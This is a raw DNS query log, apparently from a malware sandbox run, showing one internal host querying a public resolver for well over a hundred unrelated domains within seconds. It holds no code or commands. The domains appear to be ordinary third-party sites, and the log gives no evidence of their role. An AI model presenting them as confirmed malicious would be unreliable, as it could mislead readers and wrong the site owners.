                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.774830103 CEST192.168.2.68.8.8.80xca9dStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.778636932 CEST192.168.2.68.8.8.80xf54dStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.778637886 CEST192.168.2.68.8.8.80xa23dStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.838980913 CEST192.168.2.68.8.8.80xa548Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.845941067 CEST192.168.2.68.8.8.80x5cdeStandard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.870140076 CEST192.168.2.68.8.8.80xb219Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.874665976 CEST192.168.2.68.8.8.80x93c6Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.880402088 CEST192.168.2.68.8.8.80xd6b8Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.925816059 CEST192.168.2.68.8.8.80xbd1dStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.951842070 CEST192.168.2.68.8.8.80xcb04Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:56.990520954 CEST192.168.2.68.8.8.80xf8f8Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.179754972 CEST192.168.2.68.8.8.80xeddfStandard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.188643932 CEST192.168.2.68.8.8.80x1d25Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.189161062 CEST192.168.2.68.8.8.80x4cddStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.195720911 CEST192.168.2.68.8.8.80x6a59Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.205980062 CEST192.168.2.68.8.8.80x7103Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.489957094 CEST192.168.2.68.8.8.80xcd09Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.532464981 CEST192.168.2.68.8.8.80x2084Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.535743952 CEST192.168.2.68.8.8.80x2b3dStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.642169952 CEST192.168.2.68.8.8.80x6b02Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.662019014 CEST192.168.2.68.8.8.80xed33Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.719033003 CEST192.168.2.68.8.8.80xe9faStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.763576031 CEST192.168.2.68.8.8.80xc84fStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.786103010 CEST192.168.2.68.8.8.80x445Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.799964905 CEST192.168.2.68.8.8.80x7744Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.853118896 CEST192.168.2.68.8.8.80xe311Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.854005098 CEST192.168.2.68.8.8.80xa6b5Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.872678041 CEST192.168.2.68.8.8.80xf0c7Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.918282032 CEST192.168.2.68.8.8.80xec53Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.920933962 CEST192.168.2.68.8.8.80x871eStandard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.962343931 CEST192.168.2.68.8.8.80xed32Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:57.962343931 CEST192.168.2.68.8.8.80xd6b8Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.007236958 CEST192.168.2.68.8.8.80x1b91Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.009223938 CEST192.168.2.68.8.8.80x5a06Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.009223938 CEST192.168.2.68.8.8.80x36ceStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.067631960 CEST192.168.2.68.8.8.80x45c7Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.135615110 CEST192.168.2.68.8.8.80x546cStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.138051987 CEST192.168.2.68.8.8.80xa07dStandard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.142652988 CEST192.168.2.68.8.8.80xed99Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.146518946 CEST192.168.2.68.8.8.80x4f94Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.153578043 CEST192.168.2.68.8.8.80x74eeStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.233930111 CEST192.168.2.68.8.8.80xcdb3Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.234775066 CEST192.168.2.68.8.8.80x1d25Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.236910105 CEST192.168.2.68.8.8.80xd6a2Standard query (0)fifa-ews.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.321352005 CEST192.168.2.68.8.8.80xb753Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.405980110 CEST192.168.2.68.8.8.80x4287Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.482404947 CEST192.168.2.68.8.8.80xffbaStandard query (0)kairel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.489072084 CEST192.168.2.68.8.8.80xe8Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.536098003 CEST192.168.2.68.8.8.80x648fStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.539752960 CEST192.168.2.68.8.8.80xd88fStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.662641048 CEST192.168.2.68.8.8.80x79ddStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.671794891 CEST192.168.2.68.8.8.80x2f1Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.762664080 CEST192.168.2.68.8.8.80x459cStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:58.844290018 CEST192.168.2.68.8.8.80x7744Standard query (0)zugseil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.046113014 CEST192.168.2.68.8.8.80x6f6fStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.084650040 CEST192.168.2.68.8.8.80xd93dStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.157080889 CEST192.168.2.68.8.8.80x4de9Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.180922985 CEST192.168.2.68.8.8.80xd7e2Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.312315941 CEST192.168.2.68.8.8.80x52acStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.336570024 CEST192.168.2.68.8.8.80xe73eStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.625797987 CEST192.168.2.68.8.8.80x5c63Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.746334076 CEST192.168.2.68.8.8.80x1892Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.748533010 CEST192.168.2.68.8.8.80x2e98Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.889094114 CEST192.168.2.68.8.8.80x459cStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.918260098 CEST192.168.2.68.8.8.80xaa93Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.918690920 CEST192.168.2.68.8.8.80x3a4bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:59.950057030 CEST192.168.2.68.8.8.80xdf76Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.015856981 CEST192.168.2.68.8.8.80xfb0dStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.015856981 CEST192.168.2.68.8.8.80x84e4Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.034646034 CEST192.168.2.68.8.8.80xa2bdStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.128295898 CEST192.168.2.68.8.8.80x7a00Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.142813921 CEST192.168.2.68.8.8.80x98dcStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.174758911 CEST192.168.2.68.8.8.80xbfe9Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.196861982 CEST192.168.2.68.8.8.80x5041Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.226007938 CEST192.168.2.68.8.8.80x1476Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.274302006 CEST192.168.2.68.8.8.80x3fd5Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.300360918 CEST192.168.2.68.8.8.80x85a9Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.304848909 CEST192.168.2.68.8.8.80xe838Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.351536989 CEST192.168.2.68.8.8.80x6cfcStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.354162931 CEST192.168.2.68.8.8.80xff5dStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.356326103 CEST192.168.2.68.8.8.80xc38fStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.357906103 CEST192.168.2.68.8.8.80x52acStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.360441923 CEST192.168.2.68.8.8.80x8150Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.448853016 CEST192.168.2.68.8.8.80x2485Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.503931999 CEST192.168.2.68.8.8.80x7dc4Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.534841061 CEST192.168.2.68.8.8.80x7ab6Standard query (0)sjbmw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.628601074 CEST192.168.2.68.8.8.80x5c8eStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.710120916 CEST192.168.2.68.8.8.80x6713Standard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.735908985 CEST192.168.2.68.8.8.80x41e4Standard query (0)absblast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.761225939 CEST192.168.2.68.8.8.80xf02cStandard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:00.957849979 CEST192.168.2.68.8.8.80x31e5Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.146529913 CEST192.168.2.68.8.8.80xfe70Standard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.148808956 CEST192.168.2.68.8.8.80xfb0dStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.234886885 CEST192.168.2.68.8.8.80x6beStandard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.345602036 CEST192.168.2.68.8.8.80xcff6Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.356666088 CEST192.168.2.68.8.8.80x76d6Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.449567080 CEST192.168.2.68.8.8.80xaa93Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.635773897 CEST192.168.2.68.8.8.80x8fb3Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.662189007 CEST192.168.2.68.8.8.80xda74Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.759942055 CEST192.168.2.68.8.8.80x749dStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.769099951 CEST192.168.2.68.8.8.80xbaefStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.789716005 CEST192.168.2.68.8.8.80xbaffStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.900568962 CEST192.168.2.68.8.8.80xdaeaStandard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.903243065 CEST192.168.2.68.8.8.80x7f7eStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.943131924 CEST192.168.2.68.8.8.80xf190Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.946077108 CEST192.168.2.68.8.8.80xc31aStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.951423883 CEST192.168.2.68.8.8.80xd2adStandard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:01.963110924 CEST192.168.2.68.8.8.80xf72bStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.002159119 CEST192.168.2.68.8.8.80xdfcStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.088083029 CEST192.168.2.68.8.8.80xd6b5Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.091635942 CEST192.168.2.68.8.8.80xe78aStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.130721092 CEST192.168.2.68.8.8.80xcfcStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.191926003 CEST192.168.2.68.8.8.80xfd9fStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.194938898 CEST192.168.2.68.8.8.80xefebStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.201322079 CEST192.168.2.68.8.8.80xa501Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.233288050 CEST192.168.2.68.8.8.80xcb2eStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.248059988 CEST192.168.2.68.8.8.80x41bfStandard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.248059988 CEST192.168.2.68.8.8.80xa97dStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.248871088 CEST192.168.2.68.8.8.80x66c2Standard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.248965025 CEST192.168.2.68.8.8.80x66dStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.276159048 CEST192.168.2.68.8.8.80x9fa1Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.295897961 CEST192.168.2.68.8.8.80xb8e0Standard query (0)shztm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.324202061 CEST192.168.2.68.8.8.80xa9a4Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.339499950 CEST192.168.2.68.8.8.80x3b4Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.348699093 CEST192.168.2.68.8.8.80x60a4Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.451725006 CEST192.168.2.68.8.8.80x82a2Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.451725006 CEST192.168.2.68.8.8.80x44ffStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.452881098 CEST192.168.2.68.8.8.80x4ae7Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.452881098 CEST192.168.2.68.8.8.80x9a4aStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.452979088 CEST192.168.2.68.8.8.80x602dStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.457273960 CEST192.168.2.68.8.8.80x3838Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.495771885 CEST192.168.2.68.8.8.80x76d6Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.541624069 CEST192.168.2.68.8.8.80xb0c3Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.557298899 CEST192.168.2.68.8.8.80x407eStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.572108030 CEST192.168.2.68.8.8.80xf54aStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.599783897 CEST192.168.2.68.8.8.80x69aStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.637849092 CEST192.168.2.68.8.8.80xbbf6Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.652101994 CEST192.168.2.68.8.8.80xae6dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.670919895 CEST192.168.2.68.8.8.80xbcc8Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.670919895 CEST192.168.2.68.8.8.80x271eStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.671514034 CEST192.168.2.68.8.8.80x7b1cStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.672072887 CEST192.168.2.68.8.8.80x678eStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.672072887 CEST192.168.2.68.8.8.80x2b6bStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.672612906 CEST192.168.2.68.8.8.80x79bdStandard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.682111979 CEST192.168.2.68.8.8.80xa7f5Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.744358063 CEST192.168.2.68.8.8.80x3e58Standard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.746999979 CEST192.168.2.68.8.8.80xd2e3Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.878324986 CEST192.168.2.68.8.8.80x7078Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.920684099 CEST192.168.2.68.8.8.80xc83Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:02.920831919 CEST192.168.2.68.8.8.80xaa93Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.029334068 CEST192.168.2.68.8.8.80x48c3Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.164258957 CEST192.168.2.68.8.8.80xb4ddStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.430520058 CEST192.168.2.68.8.8.80x99a6Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.433660030 CEST192.168.2.68.8.8.80x9301Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.443718910 CEST192.168.2.68.8.8.80x63a8Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.466651917 CEST192.168.2.68.8.8.80xc2c3Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.466701984 CEST192.168.2.68.8.8.80x453eStandard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.536432028 CEST192.168.2.68.8.8.80xbcc1Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.542661905 CEST192.168.2.68.8.8.80x6137Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.553090096 CEST192.168.2.68.8.8.80x2d95Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.643256903 CEST192.168.2.68.8.8.80x51beStandard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.644316912 CEST192.168.2.68.8.8.80x2c07Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.645386934 CEST192.168.2.68.8.8.80x8b0aStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.645998955 CEST192.168.2.68.8.8.80x5ca6Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.657358885 CEST192.168.2.68.8.8.80xe532Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.710938931 CEST192.168.2.68.8.8.80x9cacStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.711136103 CEST192.168.2.68.8.8.80x9b10Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.712579966 CEST192.168.2.68.8.8.80xadddStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.716384888 CEST192.168.2.68.8.8.80xbb68Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.747545958 CEST192.168.2.68.8.8.80xb7c5Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.747646093 CEST192.168.2.68.8.8.80x6cdeStandard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.748806000 CEST192.168.2.68.8.8.80x8030Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.803276062 CEST192.168.2.68.8.8.80x612bStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:08:03.823321104 CEST192.168.2.68.8.8.80xd73aStandard query (0)t-mould.comA (IP address)IN (0x0001)false
